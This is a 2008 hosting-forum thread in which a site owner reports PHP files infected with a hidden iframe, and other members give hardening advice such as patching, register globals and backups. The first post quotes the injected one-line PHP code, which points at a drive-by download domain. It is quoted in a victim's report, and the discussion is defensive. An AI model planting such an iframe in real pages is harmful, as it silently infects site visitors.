JaguarPC Community - Web Hosting, VPS Hosting, cPanel VPS Hosting, Hybrid Servers, Dedicated Servers, Virutal Private Servers, Managed Servers
» Hosting Community Support
» Website Management
:
:( Someone injected my php files with a virus
| Website Management Help with uploading, editing, or manipulating files via Frontpage, FTP, SSH, file manager or other means. Subdomains, parked and multi-hosted domains as well as DNS issues can be discussed here. |
 |
|
|
Thread Tools | Display Modes |
04-10-2008, 01:41 PM
|
#1 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
:( Someone injected my php files with a virus
Someone just injected my blog with an iframe hack that sent users to Java executable with Exploit-ByteVerify virus...
I'm running Wordpress 2.5 and the latest plugins... Luckily i'm on a reseller account and have self suspended that sub-account. Any advice or knowledge about how this could be prevented would help. I'll try to find out what the exploit was soon. Here's the php injected code. I'm not at a location where I can figure out who last accessed the account... DO NOT VISIT THIS SITE! Code:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?> http://forum.coppermine-gallery.net/...c,51671.0.html
__________________
Mike Last edited by thelucky4; 04-10-2008 at 02:06 PM. |
|
|
|
04-10-2008, 02:19 PM
|
#2 |
|
Jag Veteran
Join Date: Sep 2001
Location: Albuquerque NM
Posts: 1,394
|
Wordpress has a lot of security issues. Do you have register globals disabled on your server? That seems to be the most common way hackers gain access to these scripts.
Also make sure you are keeping your scripts constantly updated.
__________________
 Pawel Kowalski Albuquerque Web Design templatesXchange - Free Web Templates - Native American Jewelry |
|
|
|
|
04-10-2008, 02:24 PM
|
#3 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
From looking at the forums on the inter-tubes, it appears this was a remote injection exploit by an uploaded *.zip file to even the latest patched Coppermine 1.4.16
So through Coppermine, it infected all of my user-wide *.php files...urr I think this is the 2nd time similar events have happened since being online in 2004...
__________________
Mike |
|
|
|
|
04-10-2008, 02:27 PM
|
#4 |
|
Jag Veteran
Join Date: Sep 2001
Location: Albuquerque NM
Posts: 1,394
|
I feel your pain, a phpBB board I host has been hacked 3 times. Since the latest patches and having register globals off it hasn't happened yet but I'm sure it will happen again in the future. Best thing you can do is have current back ups of everything.
__________________
Pawel Kowalski Albuquerque Web Design templatesXchange - Free Web Templates - Native American Jewelry |
|
|
|
|
04-10-2008, 04:22 PM
|
#5 |
|
all about nothing!
|
Not so much Wordpress as it is any gallery. Seems galleries with upload features are what hackers are always looking to exploit.
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
|
|
|
|
04-10-2008, 05:54 PM
|
#6 |
|
Nearly 100% Pure Carbon
Join Date: Nov 2007
Location: Northeast Pennsylvania
Posts: 429
|
You need to keep things up to date, get on the mialing lists for any software you install. also make sure you keep up on the updates for any hacks you use.
Other than that take whatever steps you can, for example I password protect admin folders with htaccess. This won't help for vulnerabilities in the public files but it will all but stop them dead for admin files. It's not 100% effective but nothing is.... point is they just move on to another server that is easier to attack. |
|
|
|
|
04-10-2008, 06:22 PM
|
#7 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
Hackers suck.
Anyways the good Jag team replaced the entire directory with a backup. now things are fine. no more gallery from now on.
__________________
Mike |
|
|
|
|
04-10-2008, 06:43 PM
|
#8 |
|
all about nothing!
|
take a look at the nextgen plugin for wordpress...
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
|
|
|
|
04-10-2008, 07:21 PM
|
#9 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
Wow that looks awesome. Will have to integrate it to the blog.
Thanks Frank
__________________
Mike |
|
|
|
|
04-10-2008, 11:13 PM
|
#10 |
|
all about nothing!
|
You are welcome....
I integrate this with it: http://www.laptoptips.ca/projects/wp-shutter-reloaded/
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
|
|
|
|
04-11-2008, 03:11 AM
|
#11 | |
|
Yeah, I know a LOT!
Join Date: Mar 2003
Location: Arizona Uplands Intelligence Quotient: 138+
Posts: 10,384
|
Quote:
Thanks for the laugh!!!  I'm running, like, Coppermine 1.1D... supposedly the most unsecure version ever made. I rewrote Coppermine and they offered me a position of their Dev Team, but I wasn't answering email at the time - only to have them get in my face later and threaten to sue me for hacking their code. Glad to hear they mucked it up... To date, my Coppermine rewrite was only hacked once, in 2003 I think - someone set themselves up as a mod. I plugged that, and haven't been hacked since, even though I allow anonymous uploads! Anyway, thanks for the chuckle... Um... What was your question?
__________________
DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.
|
|
|
|
|
|
04-11-2008, 03:58 AM
|
#12 | |
|
/dev/null
Join Date: Apr 2008
Posts: 116
|
Quote:
http://www.jaguarpc.com/support/kbase/731.html |
|
|
|
|
|
04-11-2008, 07:26 AM
|
#13 |
|
all about nothing!
|
Vin you are just to great for us mere mortals. We bow to your superiority! 8-)
Too bad you do not use the gallery for anything.....
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
|
|
|
|
04-11-2008, 12:28 PM
|
#14 | |
|
Yeah, I know a LOT!
Join Date: Mar 2003
Location: Arizona Uplands Intelligence Quotient: 138+
Posts: 10,384
|
Quote:
VinDSL_Search.png It's sickening, no? 
__________________
DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.
|
|
|
|
|
|
04-11-2008, 05:39 PM
|
#15 |
|
all about nothing!
|
hahaha..... ya all about Vin......
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
|
|
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
